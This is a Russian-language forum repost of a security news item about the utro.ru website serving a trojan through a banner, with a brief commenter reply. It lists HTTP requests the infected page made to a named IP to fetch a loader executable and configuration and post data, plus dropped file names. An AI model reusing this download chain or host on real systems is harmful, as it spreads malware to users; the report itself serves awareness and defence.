-
Сайт utro.ru в течение нескольких часов распространял опасный троян
Сегодня во второй половине дня, пользователи, зашедшие на сайт utro.ru, увидели предупреждение антивируса о попытке заражения троянской программой, эксплуатирующей уязвимости в Internet Explorer и Mozilla Firefox.
При подробном изучении троян выполнял следующий запрос:
GET /e1/index.php HTTP/1.1\r\n
Referer: http://utro.ru/includes5/banners/advert_part.html/r/n
Host: 81.95.149.66\r\n
а дальше происходила загрузка бота:
GET /e1/file.php HTTP/1.1\r\n
GET /ldr1.exe HTTP/1.1\r\n
GET /cfg.bin HTTP/1.0\r\n
POST /s.php?1=april_002fdf3f&i= HTTP/1.0\r\n
В результате атаки, в корне диска с: появлялся файл 3.tmp, который детектируется большинством антивирусов как Trojan-Spy.Win32.Bancos.aam. В windows/system32 записывался файл ntos.exe, который также определялся как Trojan-Spy.Win32.Bancos.aam.
По информации из Лаборатории Касперского троян шифрует пользовательские данные на компьютере и предлагает купить расшифровщик. В случае отказа, грозится выложить приватные данные пользователя в сети интернет.
В результате атаки могли пострадать несколько десятков тысяч пользователей сайта.
securitylab.ru
Left home for a few days and look what happens...
-
-
Будь в курсе!
Будь в курсе!
Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:
-
Вроде бы почерк последнего GPCode, а не Bancos. Хм...
[I]Nick Golovko
NCFU lecturer, information security specialist[/I]
Ответить с цитированием
